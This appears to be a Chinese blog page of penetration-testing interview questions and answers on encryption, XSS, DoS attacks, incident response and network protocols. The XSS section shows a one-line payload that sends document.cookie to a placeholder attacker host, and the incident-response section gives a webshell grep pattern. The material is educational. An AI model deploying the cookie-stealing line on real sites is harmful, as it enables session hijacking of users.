当前位置: 首页 > backend >正文

2025年渗透测试面试题总结-07(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、对称加密 vs 非对称加密

二、同源策略(Same-Origin Policy)

三、Cookie存储与访问

四、XSS盗取Cookie流程

五、XSS与登录凭证

六、XSS防御体系

七、SYN洪水攻击原理

八、网络钓鱼(Phishing)

九、CC攻击(Challenge Collapasar)

十、Web服务器入侵排查步骤

十一、DLL文件(动态链接库)

十二、HTTPS核心作用

十三、Web攻击防御速查

十四、协议分布层

十五、ARP协议工作原理

十六、RIP协议(路由信息协议)

十七、RARP(反向地址解析协议)

十八、OSPF协议(开放最短路径优先)

十九、TCP vs UDP核心区别

实用建议

一、对称加密和非对称加密二、什么是同源策略?三、cookie 存在哪里?可以打开吗?四、xss 如何盗取 cookie?五、xss 有 cookie 一定可以无用户名密码登录吗?六、xss 如何防御?七、SYN 攻击原理八、什么是网络钓鱼?九、什么是 CC 攻击?十、Web 服务器被入侵后,怎样进行排查?十一、dll 文件是什么意思,有什么用?十二、Https 的作用十三、防范常见的 Web 攻击十四、重要协议分布层十五、arp 协议的工作原理十六、rip 协议是什么?rip 的工作原理十七、什么是 RARP?工作原理十八、OSPF 协议?OSPF 的工作原理十九、TCP 与 UDP 区别总结

一、对称加密 vs 非对称加密

类型对称加密非对称加密
密钥机制单密钥(加密解密相同)公钥加密 + 私钥解密
速度快(适合大数据量)慢(CPU消耗高)
安全性依赖密钥保管私钥不泄露即安全
典型算法AES, DESRSA, ECC
应用场景HTTPS数据传输加密SSL握手、数字签名

二、同源策略(Same-Origin Policy)

  • 定义:浏览器限制不同源(协议+域名+端口相同)的脚本访问对方资源
  • 目的:防止恶意网站窃取用户数据(如Cookie)
  • 绕过机制
    • CORS(跨域资源共享):服务端设置Access-Control-Allow-Origin
    • JSONP:通过<script>标签加载跨域数据(仅限GET)

三、Cookie存储与访问

属性说明
存储位置浏览器本地(文件或数据库)
打开方式浏览器开发者工具 → Application → Cookies(可查看/编辑)
安全限制HttpOnly标记的Cookie禁止JS读取(防XSS盗取)
生命周期会话Cookie(关闭浏览器删除) / 持久Cookie(按Expires时间保留)

四、XSS盗取Cookie流程

mermaidsequenceDiagram attacker->>victim: 发送含恶意脚本的链接 victim->>server: 访问被攻击页面 server->>victim: 返回嵌入恶意脚本的HTML victim->>browser: 执行脚本(发送Cookie到攻击者服务器) attacker->>attacker_server: 接收Cookie数据 

关键代码document.cookie + new Image().src='http://hacker.com?cookie='+encodeURIComponent(document.cookie)


五、XSS与登录凭证

  • 有条件登录
    • ✅ 若Cookie含会话ID(如sessionid=xxx)且未设HttpOnly → 直接冒用身份
    • ❌ 若Cookie仅为用户偏好数据 → 无法登录
  • 限制
    • 会话ID需在有效期内
    • 目标网站未启用二次验证(如短信/OTP)

六、XSS防御体系

层级防御措施
输入过滤特殊字符转义(<&lt;)、白名单验证
输出编码根据上下文选择HTML/JS/URL编码(如<script>\u003cscript\u003e
CSP策略HTTP头设置Content-Security-Policy: script-src 'self'(禁止内联脚本)
Cookie安全标记HttpOnly + Secure(仅HTTPS传输)

七、SYN洪水攻击原理

  • 利用缺陷:TCP三次握手未完成时,服务端维护半连接队列(消耗资源)
  • 攻击步骤
    1. 伪造大量虚假IP发送SYN
    2. 服务端回复SYN-ACK并等待应答(队列占满)
    3. 正常用户无法建立连接
  • 防御方案
    • SYN Cookie技术(无状态验证)
    • 防火墙限制每秒SYN包数量

八、网络钓鱼(Phishing)

  • 手法:伪装可信机构(银行/支付平台),诱导用户提交敏感信息
  • 常见形式
    • 钓鱼邮件(含虚假登录链接)
    • 仿冒网站(域名如paypa1.com
    • 伪基站短信
  • 防御
    • 用户教育(识别域名、HTTPS锁标志)
    • 浏览器标记钓鱼网站(Safe Browsing API)

九、CC攻击(Challenge Collapasar)

  • 本质:针对应用层的DDoS攻击
  • 原理:模拟大量正常请求(如频繁刷新页面、API调用),耗尽服务器资源
  • 与DDoS区别
    CC攻击DDoS攻击
    应用层(HTTP)网络层(TCP/UDP洪水)
    消耗CPU/数据库消耗带宽/连接数
  • 防御
    • 人机验证(验证码)
    • 请求频率限制(IP/用户)

十、Web服务器入侵排查步骤

  1. 隔离服务器:断网防止横向渗透
  2. 备份日志
    • Web访问日志(Apache/Nginx)
    • 系统日志(/var/log/auth.log
  3. 查异常进程
    • netstat -tunlp(异常端口)
    • top(高CPU进程)
  4. 查后门文件
    • 查找近期修改文件:find / -mtime -2
    • 扫描Web目录:grep -r "eval(base64_decode" /var/www
  5. 漏洞修复:更新系统/应用补丁

十一、DLL文件(动态链接库)

  • 作用
    • 共享代码库(多个程序调用同一功能)
    • 模块化开发(如Windows系统kernel32.dll
  • 劫持风险:恶意DLL替换系统文件 → 程序加载时执行恶意代码
  • 防护
    • 签名验证(signtool verify
    • 设置DLL搜索路径白名单

十二、HTTPS核心作用

安全目标实现机制
数据保密性对称加密(如AES-256)
身份认证CA机构签发数字证书(验证服务器身份)
数据完整性MAC(消息认证码)或HMAC防篡改

十三、Web攻击防御速查

攻击类型防御方案
SQL注入参数化查询(PreparedStatement)、存储过程
CSRFAnti-CSRF Token、SameSite=Strict Cookie属性
文件上传限制扩展名(白名单)、重命名文件、存储到非Web目录
SSRF内网IP黑名单、请求目标域名白名单

十四、协议分布层

协议所属OSI层级典型应用
ARP数据链路层IP → MAC地址映射
RIP/OSPF网络层动态路由协议
TCP/UDP传输层端到端数据传输
HTTPS应用层安全HTTP通信

十五、ARP协议工作原理

  1. 查询:主机A广播ARP Request(目标IP → 问MAC)
  2. 响应:目标主机B单播ARP Reply(返回MAC)
  3. 缓存:主机A记录IP-MAC映射到ARP表(有效期分钟级)
  • 攻击风险:ARP欺骗(伪造MAC对应关系) → 中间人攻击
  • 防御:静态ARP绑定、网络设备ARP检测

十六、RIP协议(路由信息协议)

  • 类型:距离向量路由协议(基于跳数)
  • 工作原理
    1. 路由器每30秒广播路由表给邻居
    2. 跳数+1(最大15跳,16跳视为不可达)
    3. 路由收敛慢(需多次广播更新)
  • 适用场景:小型局域网(现多被OSPF替代)

十七、RARP(反向地址解析协议)

  • 作用:已知MAC地址 → 获取IP地址(无盘工作站场景)
  • 流程
    1. 客户端广播RARP Request(含自身MAC)
    2. RARP服务器响应RARP Reply(分配IP)
  • 替代协议:BOOTP、DHCP(功能更强大)

十八、OSPF协议(开放最短路径优先)

  • 类型:链路状态路由协议(基于Dijkstra算法)
  • 核心机制
    1. 洪泛法广播链路状态(LSA)
    2. 构建拓扑图 → 计算最短路径树
    3. 划分区域(Area 0为骨干)减少广播域
  • 优势:快速收敛、支持大规模网络

十九、TCP vs UDP核心区别

维度TCPUDP
连接方式面向连接(三次握手)无连接
可靠性有序、重传、流量控制尽力交付(可能丢包)
传输速度慢(头部20字节+握手延迟)快(头部8字节)
数据边界字节流(需处理粘包)数据报(保留边界)
应用场景文件传输、Web页面视频流、DNS查询、实时游戏

实用建议

  1. 协议分析:用Wireshark抓包观察TCP握手、ARP请求等流程
  2. 安全加固
    • Web服务器:定期更新补丁 + 最小化开放端口
    • 开发规范:禁用eval()、所有输入视为不可信
  3. 面试重点:深入理解HTTPS握手流程、XSS/CSRF防御方案、TCP可靠性机制

附:命令速查

  • 查看ARP缓存:arp -a
  • 检测开放端口:netstat -ano | findstr LISTENING
  • 验证证书链:openssl s_client -connect example.com:443 -showcerts
http://www.xdnf.cn/news/17242.html

相关文章:

  • 系统网络端口安全扫描脚本及详解
  • Chrome与Firefox浏览器安全运维配置命令大全:从攻防到优化的专业实践
  • 分治-快排-215.数组中的第k个最大元素-力扣(LeetCode)
  • 【Linux】从零开始:RPM 打包全流程实战万字指南(含目录结构、spec 编写、分步调试)
  • Android 的CameraX的使用(配置,预览,拍照,图像分析,录视频)
  • 使用Python提取PDF大纲(书签)完整指南
  • 持中文的 TXT 合并 PDF 工具 —— GUI + ReportLab 实战
  • Emacs 折腾日记(二十九)—— 打造C++ IDE
  • 使用 Grunt 替换 XML 文件中的属性值
  • 亚马逊跨类目铺货广告运营:从粗放投放to智能提效的省力法则
  • iOS混淆工具有哪些?跨平台 App 混淆与保护的实用方案
  • 零基础深度学习规划路线:从数学公式到AI大模型的系统进阶指南
  • 基于linux环境在centos7上部署gitlab
  • Claude Code 实战场景解析:从代码生成到系统重构的典型应用案例
  • 【类与对象(中)】C++类默认成员函数全解析
  • 智慧农业温室大棚物联网远程监控与智能监测系统
  • 一站式体育赛事平台源码解决方案
  • 虚拟机Ubuntu图形化界面root用户登录错误
  • 用 Go 写个极简反向代理,把 CC 攻击挡在业务容器之外
  • 设计模式(二)——策略模式
  • ABP VNext + Fody AOP:编译期织入与性能监控
  • JDK、eclipse的安装,配置JDK、Tomcat并使用eclipse创建项目
  • 为什么提升模型尺度可以提升模型的CoT能力
  • 人工智能基础知识笔记十五:文本分块(Chunk)
  • React+TypeScript代码注释规范指南
  • 【JMeter】调试取样器的使用
  • 【性能测试】-2- JMeter工具的使用
  • c++注意点(15)----设计模式(桥接模式与适配器模式)
  • 深入理解VideoToolbox:iOS/macOS视频硬编解码实战指南
  • TDSQL GTS文件说明